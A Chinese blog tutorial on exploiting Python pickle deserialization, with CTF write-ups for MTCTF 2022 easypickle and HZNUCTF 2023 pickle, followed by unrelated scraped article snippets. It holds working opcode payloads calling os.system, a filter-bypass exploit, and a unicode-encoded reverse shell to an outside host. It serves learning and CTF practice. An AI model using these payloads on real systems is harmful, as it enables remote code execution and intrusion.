_rev1ve

pickle反序列化

文章目录

- 基础知识
- - pickle简介
  - 可序列化对象
  - `object.__reduce__()` 函数
- pickle过程详细解读
- - opcode简介
  - pickletools
- 漏洞利用
- - 利用思路
  - 如何手写opcode
- 工具pker
- 实战例题
- - [MTCTF 2022]easypickle
  - [HZNUCTF 2023 preliminary]pickle

基础知识

pickle简介

与PHP类似，python也有序列化功能以长期储存内存中的数据。pickle是python下的序列化与反序列化包。
python有另一个更原始的序列化包marshal，现在开发时一般使用pickle。
与json相比，pickle以二进制储存，不易人工阅读；json可以跨语言，而pickle是Python专用的；pickle能表示python几乎所有的类型（包括自定义类型），json只能表示一部分内置类型且不能表示自定义类型。
pickle实际上可以看作一种独立的语言，通过对opcode的更改编写可以执行python代码、覆盖变量等操作。直接编写的opcode灵活性比使用pickle序列化生成的代码更高，有的代码不能通过pickle序列化得到（pickle解析能力大于pickle生成能力）。

可序列化对象

None，True 和 False
整数、浮点数、复数
str、byte、bytearray
只包含可封存对象的集合，包括 tuple(元组)、list、set 和 dict
定义在模块最外层的函数（使用 def 定义，lambda 函数则不可以）
定义在模块最外层的内置函数
定义在模块最外层的类
__dict__ 属性值或 __getstate__() 函数的返回值可以被序列化的类（详见官方文档的Pickling Class Instances）

`object.reduce()` 函数

在开发时，可以通过重写类的 object.__reduce__() 函数，使之在被实例化时按照重写的方式进行。具体而言，python要求 object.__reduce__() 返回一个 (callable, ([para1,para2...])[,...]) 的元组，每当该类的对象被unpickle时，该callable就会被调用以生成对象（该callable其实是构造函数）。
在下文pickle的opcode中， R 的作用与 object.__reduce__() 关系密切：选择栈上的第一个对象作为函数、第二个对象作为参数（第二个对象必须为元组），然后调用该函数。其实 R 正好对应 object.__reduce__() 函数， object.__reduce__() 的返回值会作为 R 的作用对象，当包含该函数的对象被pickle序列化时，得到的字符串是包含了 R 的。

pickle过程详细解读

pickle解析依靠Pickle Virtual Machine (PVM)进行。

PVM涉及到三个部分：1. 解析引擎 2. 栈 3. 内存：

解析引擎：从流中读取 opcode 和参数，并对其进行解释处理。重复这个动作，直到遇到 . 停止。最终留在栈顶的值将被作为反序列化对象返回。
栈：由Python的list实现，被用来临时存储数据、参数以及对象。
memo：由Python的dict实现，为PVM的生命周期提供存储。简单理解就是将反序列化完成的数据以 key-value 的形式储存在memo中，以便后来使用。

opcode简介

pickle由于有不同的实现版本，在py3和py2中得到的opcode不相同。但是pickle可以向下兼容（所以用v0就可以在所有版本中执行）。目前，pickle有6种版本。

pickle0版本的部分opcode表格：

Opcode	Data type loaded onto the stack	Example
S	String	S’foo’\n
V	Unicode	Vfo\u006f\n
I	Integer	I42\n
…	…	…

pickletools

使用pickletools可以方便的将opcode转化为便于肉眼读取的形式

示例

import pickletools

opcode=b'''cos
system
(S'whoami'
tR.'''

print(pickletools.dis(opcode))
print(opcode)

运行结果

漏洞利用

利用思路

任意代码执行或命令执行。
变量覆盖，通过覆盖一些凭证达到绕过身份验证的目的。

如何手写opcode

在CTF中，很多时候需要一次执行多个函数或一次进行多个指令，此时就不能光用 __reduce__ 来解决问题（reduce一次只能执行一个函数，当exec被禁用时，就不能一次执行多条指令了），而需要手动拼接或构造opcode了。手写opcode是pickle反序列化比较难的地方。
在这里可以体会到为何pickle是一种语言，直接编写的opcode灵活性比使用pickle序列化生成的代码更高，只要符合pickle语法，就可以进行变量覆盖、函数执行等操作。
根据前文不同版本的opcode可以看出，版本0的opcode更方便阅读，所以手动编写时，一般选用版本0的opcode。下文中，所有opcode为版本0的opcode。

常用opcode解析

opcode	描述	具体写法	栈上的变化	memo上的变化
c	获取一个全局对象或import一个模块（注：会调用import语句，能够引入新的包）	c[module]\n[instance]\n	获得的对象入栈	无
o	寻找栈中的上一个MARK，以之间的第一个数据（必须为函数）为callable，第二个到第n个数据为参数，执行该函数（或实例化一个对象）	o	这个过程中涉及到的数据都出栈，函数的返回值（或生成的对象）入栈	无
i	相当于c和o的组合，先获取一个全局函数，然后寻找栈中的上一个MARK，并组合之间的数据为元组，以该元组为参数执行全局函数（或实例化一个对象）	i[module]\n[callable]\n	这个过程中涉及到的数据都出栈，函数返回值（或生成的对象）入栈	无
N	实例化一个None	N	获得的对象入栈	无
S	实例化一个字符串对象	S’xxx’\n（也可以使用双引号、'等python字符串形式）	获得的对象入栈	无
V	实例化一个UNICODE字符串对象	Vxxx\n	获得的对象入栈	无
I	实例化一个int对象	Ixxx\n	获得的对象入栈	无
F	实例化一个float对象	Fx.x\n	获得的对象入栈	无
R	选择栈上的第一个对象作为函数、第二个对象作为参数（第二个对象必须为元组），然后调用该函数	R	函数和参数出栈，函数的返回值入栈	无
.	程序结束，栈顶的一个元素作为pickle.loads()的返回值	.	无	无
(	向栈中压入一个MARK标记	(	MARK标记入栈	无
t	寻找栈中的上一个MARK，并组合之间的数据为元组	t	MARK标记以及被组合的数据出栈，获得的对象入栈	无
)	向栈中直接压入一个空元组	)	空元组入栈	无
l	寻找栈中的上一个MARK，并组合之间的数据为列表	l	MARK标记以及被组合的数据出栈，获得的对象入栈	无
]	向栈中直接压入一个空列表	]	空列表入栈	无
d	寻找栈中的上一个MARK，并组合之间的数据为字典（数据必须有偶数个，即呈key-value对）	d	MARK标记以及被组合的数据出栈，获得的对象入栈	无
}	向栈中直接压入一个空字典	}	空字典入栈	无
p	将栈顶对象储存至memo_n	pn\n	无	对象被储存
g	将memo_n的对象压栈	gn\n	对象被压栈	无
0	丢弃栈顶对象	0	栈顶对象被丢弃	无
b	使用栈中的第一个元素（储存多个属性名: 属性值的字典）对第二个元素（对象实例）进行属性设置	b	栈上第一个元素出栈	无
s	将栈的第一个和第二个对象作为key-value对，添加或更新到栈的第三个对象（必须为列表或字典，列表以数字作为key）中	s	第一、二个元素出栈，第三个元素（列表或字典）添加新值或被更新	无
u	寻找栈中的上一个MARK，组合之间的数据（数据必须有偶数个，即呈key-value对）并全部添加或更新到该MARK之前的一个元素（必须为字典）中	u	MARK标记以及被组合的数据出栈，字典被更新	无
a	将栈的第一个元素append到第二个元素(列表)中	a	栈顶元素出栈，第二个元素（列表）被更新	无
e	寻找栈中的上一个MARK，组合之间的数据并extends到该MARK之前的一个元素（必须为列表）中	e	MARK标记以及被组合的数据出栈，列表被更新	无

由这些opcode我们可以得到一些需要注意的地方：

编写opcode时要想象栈中的数据，以正确使用每种opcode。
在理解时注意与python本身的操作对照（比如python列表的append对应a、extend对应e；字典的update对应u）。
c操作符会尝试import库，所以在pickle.loads时不需要漏洞代码中先引入系统库。
pickle不支持列表索引、字典索引、点号取对象属性作为左值，需要索引时只能先获取相应的函数（如getattr、dict.get）才能进行。但是因为存在s、u、b操作符，作为右值是可以的。即“查值不行，赋值可以”。pickle能够索引查值的操作只有c、i。而如何查值也是CTF的一个重要考点。
s、u、b操作符可以构造并赋值原来没有的属性、键值对。

函数执行
与函数执行相关的opcode有三个： R 、 i 、 o ，所以我们可以从三个方向进行构造：

1.R:

b'''cos
system
(S'whoami'
tR.'''

调用os模块的system函数，传入执行命令。
解释一下，首先是c操作符调用os模块的system函数，接着MARK标记入栈，实例化字符串whoami，运用t操作符寻找栈中的上一个MARK(也就是()，并组合之间的数据为元组，然后使用R操作符选择栈上的第一个对象作为函数、第二个对象作为参数命令执行

2.i:

b'''(S'whoami'
ios
system
.'''

运用i操作符，具体可看前文opcode表格

3.o:

b'''(cos
system
S'whoami'
o.'''

本文参考文章：链接

工具pker

不同系统生成的payload不一样，所以根据具体需求进行使用

实战例题

[MTCTF 2022]easypickle

pickle反序列化源码

try:
	a = base64.b64decode(session.get('ser_data')).replace(b"builtin", b"BuIltIn").replace(b"os", b"Os").replace(b"bytes", b"Bytes")
	if b'R' in a or b'i' in a or b'o' in a or b'b' in a:
		raise pickle.UnpicklingError("R i o b is forbidden")
	pickle.loads(base64.b64decode(session.get('ser_data')))
	return "ok"
except:
	return "error!"

首先将opcode进行关键字替换，然后base64解码赋值给a；接着进行if判断Rirb是否存在变量a中，然后进行pickle反序列化

这里虽然禁用操作符使得难以绕过，但是waf存在逻辑漏洞，也就是说pickle的对象是ser_data，而不是a，所以我们opcode中有os虽然被替换成Os，但是我们还是能执行opcode

payload

opcode=b'''(S'key1'\nS'val1'\ndS'vul'\n(cos\nsystem\nVcalc\nos.'''

//pickletools转换一下
    0: (    MARK						先传入一个标志到堆栈上，
    1: S        STRING     'key1'		给栈添加一行string类型数据key1
    9: S        STRING     'val1'		给栈添加一行string数据val1
   17: d        DICT       (MARK at 0)	将堆栈里面的所有数据取出然后组成字典放入堆栈
   18: S    STRING     'vul'			放入一个string类型数据vul
   25: (    MARK						再传入一个标志
   26: c        GLOBAL     'os system'	c操作码提取下面的两行作为module下的一个全局对象此时就是os.system
   37: V        UNICODE    'calc'		读入一个字符串，以\n结尾；然后把这个字符串压进栈中
   43: o        OBJ        (MARK at 25)	o操作码建立并入栈一个对象（传入的第一个参数为callable，可以执行一个函数））
   44: s    SETITEM						从堆栈中弹出三个值，一个字典，一个键和值。键/值条目是添加到字典，它被推回到堆栈上
   45: .    STOP

本题需要反弹shell，但是语句里面存在字符i，我们利用V操作符识别\u的特性，将语句unicode编码一下即可

import base64
opcode=b'''(S'key1'\nS'val1'\ndS'vul'\n(cos\nsystem\nV\u0062\u0061\u0073\u0068\u0020\u002d\u0063\u0020\u0027\u0073\u0068\u0020\u002d\u0069\u0020\u003e\u0026\u0020\u002f\u0064\u0065\u0076\u002f\u0074\u0063\u0070\u002f\u0035\u0069\u0037\u0038\u0031\u0039\u0036\u0033\u0070\u0032\u002e\u0079\u0069\u0063\u0070\u002e\u0066\u0075\u006e\u002f\u0035\u0038\u0032\u0036\u0035\u0020\u0030\u003e\u0026\u0031\u0027\nos.'''
print(base64.b64encode(opcode))

[HZNUCTF 2023 preliminary]pickle

打开题目，直接给了源码

import base64
import pickle
from flask import Flask, request
 
app = Flask(__name__)
 
 
@app.route('/')
def index():
    with open('app.py', 'r') as f:
        return f.read()
 
 
@app.route('/calc', methods=['GET'])
def getFlag():
    payload = request.args.get("payload")
    pickle.loads(base64.b64decode(payload).replace(b'os', b''))
    return "ganbadie!"
 
 
@app.route('/readFile', methods=['GET'])
def readFile():
    filename = request.args.get('filename').replace("flag", "????")
    with open(filename, 'r') as f:
        return f.read()
 
 
if __name__ == '__main__':
    app.run(host='0.0.0.0')

分析一下，给了两个路由

/calc路由提供GET参数payload，然后pickle反序列化，并且过滤了关键字os，我们可以用拼接绕过
/readFile路由提供GET参数filename，对其读取文件

exp（flag在环境变量中）

import pickle
import base64
 
class A():
    def __reduce__(self):
        return (eval,("__import__('o'+'s').system('env | tee a')",))
 
a = A()
b = pickle.dumps(a)
print(base64.b64encode(b))

然后读取得到flag

Python 数据分析 - 初识 Pandas 一名技术极客 #Python 进阶爬虫 python 数据分析 pandas
Python数据分析-初识Pandas简介SeriesDataFrame创建基本操作添加删除简介Pandas基于NumPy开发，它提供了快速、灵活、明确的数据结构，旨在简单、直观地处理数据。Pandas适用于处理以下类型的数据：有序和无序的时间序列数据带行列标签的矩阵数据，包括同构或异构型数据与SQL或Excel表类似的，含异构列的表格数据任意其它形式的观测、统计数据集，数据转入Pandas数据结
github最强Chatbox AI 模型桌面，支持 ChatGPT、Claude等主流模型，适用于 Win、Linux等，总结文档图片并互动，智能编程，AI实时联网搜索与查询，图片生成，科研写作等 struggle2025 人工智能深度学习语音识别计算机视觉语言模型图像处理数据分析
一、软件介绍（文末提供下载）Chatbox是一个AI模型桌面客户端，支持ChatGPT、Claude、GoogleGemini、Ollama等主流模型，适用于Windows、Mac、Linux、Web、Android和iOS全平台。github地址：GitHub-Bin-Huang/chatbox:User-friendlyDesktopClientAppforAIModels/LLMs(GPT,
Python中使用SQLite 昂热校长
开发十年，就只剩下这套Java开发体系了>>>SQLite：SQLite是一种数据库，Python中集成了SQLite3，所以在Python中使用SQLite，可以直接导入SQLite包，不需要做额外的配置。更多的SQLite简介和相关知识可以查看专门的教程：http://www.runoob.com/sqlite/sqlite-tutorial.htmlPython中使用SQLite:可以直接像
Python自动摘要与文本摘录 CrMylive. python easyui 开发语言
前言随着互联网时代的到来，信息爆炸的问题越来越严重，人们需要处理的信息量也越来越大。在这种情况下，文本摘要和摘录技术变得越来越重要。文本摘要和摘录技术可以自动从大量的文本中提取出重要的信息，为人们快速掌握信息提供了有效的途径。本文将介绍Python自动摘要与文本摘录的相关技术，包括文本摘要和摘录的定义、方法、应用场景等方面。本文将从以下几个方面进行讲解：文本摘要和摘录的定义与概述文本摘要的方法和技
pycharm、anaconda安装tensorflow问题努力的南波万 pycharm tensorflow neo4j
(pythonconda01)C:\Users\lvd13>condainstalltensorflowChannels:-defaultsPlatform:win-64Collectingpackagemetadata(repodata.json):doneSolvingenvironment:|warninglibmambaAddedemptydependencyforproblemtypeS
2025年美赛数学建模 MCM Problem B: Managing Sustainable Tourism 问题 B：可持续旅游管理代码解析 2025年数学建模美赛 2025年美赛MCM/ICM 数学建模旅游 2025美赛 2025年数学建模美赛 python代码 matlab 可持续旅游管理
目录代码框架：遗传算法优化可持续旅游模型python代码代码解析：matlab代码代码解析：代码框架：遗传算法优化可持续旅游模型python代码importnumpyasnpimportrandomimportmatplotlib.pyplotasplt#定义遗传算法的参数POP_SIZE=100#种群大小GENS=500#迭代代数MUTATION_RATE=0.01#变异率CROSSOVER_R
C++ 并发编程指南（3）线程安全一个不务正业的程序猿 C++并发编程指南 c++安全 java
文章目录一、线程安全1、什么是线程安全？2、并发编程Bug源头2.1、可见性问题2.2、有序性问题2.3、原子性问题3、线程安全的基本原则前言在多线程编程中，线程安全是一个至关重要的概念。当多个线程并发访问共享数据时，如果没有适当的同步机制，就可能导致数据竞争、死锁、饥饿等问题。一、线程安全1、什么是线程安全？解释一线程安全是指代码在多线程环境下运行时的安全性。如果一个类或者函数在多线程环境中被安
python 操作sqlite COSummer python python sqlite
importsqlite3if__name__=='__main__':cx=sqlite3.connect("C:/Users/503061752/Desktop/AutoTest.sdb")cu=cx.cursor()cu.execute("select*fromwaiting_time")res=cu.fetchall()forcurresinres:print(curres)以上代码实现的
Python 实现文本摘要功能热爱技术的小胡 python
互联网时代信息爆炸式增长，人们面对越来越多的信息无法一一阅读，而文本自动摘要技术可以一定程度上缓解这个问题。摘要就是一篇文章的核心部分信息，文本自动摘要技术分抽取式摘要和生成式摘要，前者是在原文中挑选一定比例的句子拼凑成一个摘要，后者更接近人为的总结式简写一篇文章。目前越来越多的研究者使用深度神经网络来研究生成式摘要技术，但是难度也挺大，效果有限。本文的方法是使用基于启发式规则的算法实现了一个抽取
使用Python实现文本自动摘要 UIEdit python 人工智能开发语言
使用Python实现文本自动摘要在互联网时代，信息量不断增加，但人类阅读速度是有限的，如何高效地阅读和获取信息成为一项重要的任务。文本自动摘要技术可以帮助我们快速获取一篇文章的核心内容，从而提高阅读效率。文本自动摘要分为抽取式摘要和生成式摘要两种方法。其中抽取式摘要是从原文中选择一定比例的句子拼凑成一个摘要，而生成式摘要是通过对原文进行解析、理解、推理等方式生成摘要。下面我们将介绍如何使用Pyth
深入探讨：服务器如何响应前端请求及后端如何查看前端提交的数据我的青春不太冷服务器前端运维
深入探讨：服务器如何响应前端请求及后端如何查看前端提交的数据一、服务器如何响应前端请求前端与后端的交互主要通过HTTP协议实现。以下是详细步骤：1.前端发起HTTP请求GET请求：用于从服务器获取数据。POST请求：用于向服务器提交数据。例如，使用JavaScript的fetchAPI发送POST请求：fetch('https://example.com/api/data',{method:'PO
2025年01月30日Github流行趋势油泼辣子多加 GitHub每日趋势 github
项目名称：Janus项目地址url：https://github.com/deepseek-ai/Janus项目语言：Python历史star数：11942今日star数：2187项目维护者：learningpro,hills-code,TheOneTrueGuy,mowentian,soloice项目简介：Janus系列：统一多模态理解和生成模型项目名称：DeepSeek-Coder项目地址ur
SQL注入漏洞之后渗透如何利用利用的点是什么？一篇文章给你说明白浩浩测试一下 SQL注入漏洞 sql web安全数据库网络安全网络攻击模型安全架构
目录编辑读取服务器敏感文件数据利用注入点能干什么读取数据库数据语句函数group_concat(arg)指令：注意：木马相关木马写入【挂马】语句：获取后台真实物理路径读取服务器敏感文件数据利用注入点能干什么能读取服务器数据读取敏感文件控制服务器能读写文件就是Load_file需要尝试返回空返回错误就不能读写文件了Selectload_file读取敏感文件敏感文件目录扫描selectload_fil
JavaScript逆向高阶指南：突破基础，掌握核心逆向技术不做超级小白 web逆向知识碎片 web前端 javascript 开发语言 ecmascript
JavaScript逆向高阶指南：突破基础，掌握核心逆向技术JavaScript逆向工程是Web开发者和安全分析师的核心竞争力。无论是解析混淆代码、分析压缩脚本，还是逆向Web应用架构，掌握高阶逆向技术都将助您深入理解复杂JavaScript逻辑。本文将通过实战案例，带您探索JavaScript逆向的深层技术原理。1.JavaScript反混淆实战现代Web应用常采用多重混淆技术保护代码，以下为高
网络工程师：华为设备BGP命令大全 wljslmz 网络技术华为 BGP 路径矢量协议
华为（Huawei）作为全球领先的信息与通信技术（ICT）解决方案供应商，其网络设备广泛应用于企业网络和运营商网络中。边界网关协议（BorderGatewayProtocol，BGP）是互联网的主要路由协议，用于在不同自治系统（AS）之间交换路由信息。掌握华为设备的BGP命令对于网络工程师至关重要，因为这不仅涉及日常的网络运维，还影响到网络的整体性能和安全性。本文将详细介绍华为设备中的BGP命令，
安全漏洞扫描与修复系统的高质量技术详解我的运维人生网络安全 web安全运维开发技术共享
安全漏洞扫描与修复系统的高质量技术详解在当今的数字化时代，网络安全已成为企业和个人不可忽视的重要议题。安全漏洞扫描与修复系统作为保障网络安全的关键环节，其重要性日益凸显。本文将深入探讨安全漏洞扫描与修复系统的原理、流程、工具选择以及实际代码使用案例，旨在为CSDN的VIP读者提供一份全面且实用的技术指南。一、安全漏洞扫描与修复系统概述安全漏洞扫描是指通过特定的技术手段，对计算机系统、应用程序或网络
区块链学习资料 sunchenzl 区块链学习资料
本文列举了关于区块链和数字加密技术的文章和资源，分为以下几个部分：构建区块和基础；基础（和历史）；关键概念——包括特定课题（例如区块链治理）；隐私和安全；扩展；共识算法、加密货币经济和投资；资金筹集和通证分布；去中心化交易所；稳定货币；加密货币经济原生产品（数字加密收藏品、管理市场、游戏）。最后，文章还提供了开发者教程、实践教程和人物事迹，以及其他资源，例如时事新闻和课程。干货满满哦！1、构建区块
快手NS sig3签名算法（2025年1月） sh_moranliunian 蜘蛛侠网络爬虫后端 python 爬虫算法
kuaishou/__NS_sig3.js源码见文章最后。python中调用示例importjsonimportsysimportrequestsimportosimportexecjsimporthashlibimportdatetimefromCookieUtilimportCookieUtilfromfake_useragentimportUserAgentnormal_js=execjs.
通过爬虫方式实现视频号助手发布视频 sh_moranliunian 蜘蛛侠 python 网络协议爬虫网络爬虫后端
1、将真实的cookie贴到解压后目录中cookie.txt文件里，修改python代码里的user_agent和video_path,cover_path等变量的值，最后运行python脚本即可；2、运行之前根据import提示安装一些常见依赖，比如requests等；3、2025年1月份最新版；代码如下：importjsonimporttimeimportrequestsimportosimp
前后端分离项目在内网使用https协议梦境之冢 https 网络协议 http spring boot 前端 vue nginx
在SpringBoot中启用HTTPS在现代的网络通信中，安全性成为了一个不能忽视的要求。特别是当我们谈论到数据传输时，保护用户信息的安全性是非常重要的。HTTP协议在数据传输过程中为加密提供了有限的支持，而HTTPS则是HTTP的安全版本，它在HTTP的基础上增加了SSL/TLS协议，用于在客户端和服务器之间的数据传输过程中进行加密，从而提供了更安全的数据传输方式。HTTPS需要使用SSL/TL
python的with中的变量是不是局部作用域？Python上下文管理器-with使用? 梦境之冢 python 开发实战问题解决 python 开发语言
一、Python中的with语句并不创建新的作用域。‌在with语句中定义的变量，其作用域并不局限于with语句块内部，而是在整个作用域内都是可见的。这意味着在with语句块外部也可以访问这些变量，不会因为with语句的存在而创建新的作用域。例如，以下代码中的变量a在with语句块外部也可以访问：withopen('test.txt','w')asfout:a=12line='testline\n
【零散技术】MAC 安装多版本node Odoo穆尘前端 macos
时间是我们最宝贵的财富,珍惜手上的每个时分不同前端项目运行的node版本不一致，会导致无法运行，就像Odoo也需要依据版本使用对应的python环境。python可以用conda随时切换版本，那么Node可以吗？答案是肯定的。1、安装n（类似于conda的工具，单一字符还是很特别）npminstall-gn2、安装nodesudo-En14.21.3版本参照表Node.jsVersionRelea
OpenAI 函数调用功能入门 AI火箭 chatgpt openai
Javascript版Langchain入门作者：AI小火箭的HB我是AI小火箭的HB，我探索和写作人工智能和语言交叉点的所有事物，范围从LLM，聊天机器人，语音机器人，开发框架，以数据为中心的潜在空间等。介绍LangChain是一个开源Python库，用于构建由大型语言模型（LLM）支持的应用程序。它提供了一个框架，将LLM与其他数据源（如互联网或个人文件）连接起来，允许开发人员将多个命令链接在
使用Python爬取短视频平台视频和评论数据 Python爬虫项目 2025年爬虫实战项目 python 音视频开发语言爬虫
随着短视频平台如抖音、快手、YouTube等的普及，短视频成为了人们表达、记录和消费信息的重要媒介。这些平台上的海量视频和评论数据为市场分析、用户研究和内容优化提供了重要支持。本篇博客将详细讲解如何使用Python抓取短视频平台的视频和评论数据，内容涵盖目标分析、技术选型、代码实现以及防反爬策略，力求全面覆盖数据抓取过程中的技术细节。目录一、短视频平台数据抓取的背景与需求1.为什么需要抓取短视频数
Google Protocol Buffers的.NET与Python 步、步、为营 .net python php
一、引言大家好，我是[博主名字]，一直致力于探索各种有趣且实用的技术，今天想和大家分享在项目开发中遇到的一个十分强大的工具——GoogleProtocolBuffers，以及它在.NET与Python这两种不同语言环境中的应用和实践。在当今的软件开发领域，我们常常会面临跨语言通信的挑战。比如，一个大型项目可能由多个不同语言编写的模块组成，.NET凭借其强大的生态系统和对Windows平台的深度集成
基于Python增加抖音视频播放量的代码 sh_moranliunian 蜘蛛侠网络爬虫后端 python 爬虫
一、思路通过发送HTTP请求来实现这一功能。代码主要功能的简要介绍：1.`get_ttwid`：这个函数用于获取`ttwid`，它是通过向字节跳动的接口发送POST请求，并从响应的cookie中提取`ttwid`值。2.`get_web_id`：这个函数用于获取`web_id`，它是通过向某个API发送POST请求，并从响应中提取`web_id`。3.`get_ms_token`：这个函数生成一个
VSCode 创建Python 项目(最简单，最少步骤，无痛从pycharm迁移项目) 以史为镜 vscode ide 编辑器
第一步：下载下载地址：https://code.visualstudio.com/docs/?dv=win64user第二步：配置2.1：VsCode设置中文按住键盘上的“Ctrl+Shift+P”组合键，打开命令面板。在命令面板中输入“ConfigureDisplayLanguage”。点击“ConfigureDisplayLanguage”选项。在弹出的语言选择列表中，选择“zh-cn”，代表
服务器上安装Nginx详细步骤孙尚香蕉 nginx java 服务器前端
第一步：上传nginx压缩包到指定目录。第二步：解压nginx压缩包。第三步：配置编译nginx配置编译方法：./configure配置编译后结果信息：第四步：编译nginx在nginx源文件目录中直接运行make命令第五步：安装nginx：在运行make命令的nginx目录中运行makeinstall命令安装后可以运行whereisnginx命令查找nginx工作目录
OpenEuler学习笔记（十四）：在OpenEuler上搭建.NET运行环境向上的车轮 openEuler 笔记学习笔记 .net linux
一、在OpenEuler上搭建.NET运行环境基于包管理器安装添加Microsoft软件源：运行命令sudorpm-Uvhhttps://packages.microsoft.com/config/centos/8/packages-microsoft-prod.rpm，将Microsoft软件源添加到系统中，以便后续能够从该源安装.NET相关的包。安装.NET运行时或SDK：若只需要运行.NET
Android Gradle Kotlin DSL，使用Kotlin来构建Gradle 张雨zy kotlin Android基础
Demohttps://gitee.com/olleh/my-kotlin-dsl.gitGradleKotlinDSL我们现在AndroidStudio是使用Gradle来编译，而默认的构建语言是Groovy，我们可以用Kotlin来代替Groovy，Groovy构建脚本是.gradle结尾，Koltin构建的脚本则是.gradle.kts结尾优势：节约Groovy的学习成本错误提示代码自动补全
tomcat基础与部署发布暗黑小菠萝 Tomcat java web
从51cto搬家了，以后会更新在这里方便自己查看。做项目一直用tomcat，都是配置到eclipse中使用，这几天有时间整理一下使用心得，有一些自己配置遇到的细节问题。 Tomcat：一个Servlets和JSP页面的容器，以提供网站服务。一、Tomcat安装安装方式：①运行.exe安装包 &n
网站架构发展的过程 ayaoxinchao 数据库应用服务器网站架构
1.初始阶段网站架构：应用程序、数据库、文件等资源在同一个服务器上 2.应用服务和数据服务分离：应用服务器、数据库服务器、文件服务器 3.使用缓存改善网站性能：为应用服务器提供本地缓存，但受限于应用服务器的内存容量，可以使用专门的缓存服务器，提供分布式缓存服务器架构 4.使用应用服务器集群改善网站的并发处理能力：使用负载均衡调度服务器，将来自客户端浏览器的访问请求分发到应用服务器集群中的任何
[信息与安全]数据库的备份问题 comsci 数据库
如果你们建设的信息系统是采用中心-分支的模式,那么这里有一个问题如果你的数据来自中心数据库,那么中心数据库如果出现故障,你的分支机构的数据如何保证安全呢? 是否应该在这种信息系统结构的基础上进行改造,容许分支机构的信息系统也备份一个中心数据库的文件呢? &n
使用maven tomcat plugin插件debug关联源代码商人shang maven debug 查看源码 tomcat-plugin
*首先需要配置好'''maven-tomcat7-plugin'''，参见[[Maven开发Web项目]]的'''Tomcat'''部分。 *配置好后，在[[Eclipse]]中打开'''Debug Configurations'''界面，在'''Maven Build'''项下新建当前工程的调试。在'''Main'''选项卡中点击'''Browse Workspace...'''选择需要开发的
大访问量高并发 oloz 大访问量高并发
大访问量高并发的网站主要压力还是在于数据库的操作上，尽量避免频繁的请求数据库。下面简要列出几点解决方案： 01、优化你的代码和查询语句，合理使用索引 02、使用缓存技术例如memcache、ecache将不经常变化的数据放入缓存之中 03、采用服务器集群、负载均衡分担大访问量高并发压力 04、数据读写分离 05、合理选用框架，合理架构(推荐分布式架构)。
cache 服务器小猪猪08 cache
Cache 即高速缓存.那么cache是怎么样提高系统性能与运行速度呢？是不是在任何情况下用cache都能提高性能？是不是cache用的越多就越好呢？我在近期开发的项目中有所体会，写下来当作总结也希望能跟大家一起探讨探讨，有错误的地方希望大家批评指正。　　1.Cache 是怎么样工作的? 　　Cache 是分配在服务器上
mysql存储过程香水浓 mysql
Description:插入大量测试数据 use xmpl; drop procedure if exists mockup_test_data_sp; create procedure mockup_test_data_sp( in number_of_records int ) begin declare cnt int; declare name varch
CSS的class、id、css文件名的常用命名规则 agevs JavaScript UI 框架 Ajax css
CSS的class、id、css文件名的常用命名规则 (一)常用的CSS命名规则　　头：header 　　内容：content/container 　　尾：footer 　　导航：nav 　　侧栏：sidebar 　　栏目：column 　　页面外围控制整体布局宽度：wrapper 　　左右中：left right
全局数据源 AILIKES java tomcat mysql jdbc JNDI
实验目的：为了研究两个项目同时访问一个全局数据源的时候是创建了一个数据源对象，还是创建了两个数据源对象。 1：将diuid和mysql驱动包（druid-1.0.2.jar和mysql-connector-java-5.1.15.jar）copy至%TOMCAT_HOME%/lib下；2：配置数据源，将JNDI在%TOMCAT_HOME%/conf/context.xml中配置好,格式如下：&l
MYSQL的随机查询的实现方法 baalwolf mysql
MYSQL的随机抽取实现方法。举个例子，要从tablename表中随机提取一条记录，大家一般的写法就是：SELECT * FROM tablename ORDER BY RAND() LIMIT 1。但是，后来我查了一下MYSQL的官方手册，里面针对RAND()的提示大概意思就是，在ORDER BY从句里面不能使用RAND()函数，因为这样会导致数据列被多次扫描。但是在MYSQL 3.23版本中，
JAVA的getBytes()方法 bijian1013 java eclipse unix OS
在Java中，String的getBytes()方法是得到一个操作系统默认的编码格式的字节数组。这个表示在不同OS下，返回的东西不一样！ String.getBytes(String decode)方法会根据指定的decode编码返回某字符串在该编码下的byte数组表示，如： byte[] b_gbk = "
AngularJS中操作Cookies bijian1013 JavaScript AngularJS Cookies
如果你的应用足够大、足够复杂，那么你很快就会遇到这样一咱种情况：你需要在客户端存储一些状态信息，这些状态信息是跨session(会话)的。你可能还记得利用document.cookie接口直接操作纯文本cookie的痛苦经历。幸运的是，这种方式已经一去不复返了，在所有现代浏览器中几乎
[Maven学习笔记五]Maven聚合和继承特性 bit1129 maven
Maven聚合在实际的项目中，一个项目通常会划分为多个模块，为了说明问题，以用户登陆这个小web应用为例。通常一个web应用分为三个模块： 1. 模型和数据持久化层user-core, 2. 业务逻辑层user-service以 3. web展现层user-web， user-service依赖于user-core user-web依赖于user-core和use
【JVM七】JVM知识点总结 bit1129 jvm
1. JVM运行模式 1.1 JVM运行时分为-server和-client两种模式，在32位机器上只有client模式的JVM。通常，64位的JVM默认都是使用server模式，因为server模式的JVM虽然启动慢点，但是，在运行过程，JVM会尽可能的进行优化 1.2 JVM分为三种字节码解释执行方式：mixed mode, interpret mode以及compiler
linux下查看nginx、apache、mysql、php的编译参数 ronin47
在linux平台下的应用，最流行的莫过于nginx、apache、mysql、php几个。而这几个常用的应用，在手工编译完以后，在其他一些情况下（如：新增模块），往往想要查看当初都使用了那些参数进行的编译。这时候就可以利用以下方法查看。 1、nginx [root@361way ~]# /App/nginx/sbin/nginx -V nginx: nginx version: nginx/
unity中运用Resources.Load的方法？ brotherlamp unity视频 unity资料 unity自学 unity unity教程
问：unity中运用Resources.Load的方法？答：Resources.Load是unity本地动态加载资本所用的方法,也即是你想动态加载的时分才用到它,比方枪弹,特效,某些实时替换的图像什么的,主张此文件夹不要放太多东西,在打包的时分,它会独自把里边的一切东西都会集打包到一同,不论里边有没有你用的东西,所以大多数资本应该是自个建文件放置 1、unity实时替换的物体即是依据环境条件
线段树-入门 bylijinnan java 算法线段树
/** * 线段树入门 * 问题：已知线段[2,5] [4,6] [0,7]；求点2,4,7分别出现了多少次 * 以下代码建立的线段树用链表来保存，且树的叶子结点类似[i,i] * * 参考链接：http://hi.baidu.com/semluhiigubbqvq/item/be736a33a8864789f4e4ad18 * @author lijinna
全选与反选 chicony 全选
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>全选与反选</title>
vim一些简单记录 chenchao051 vim
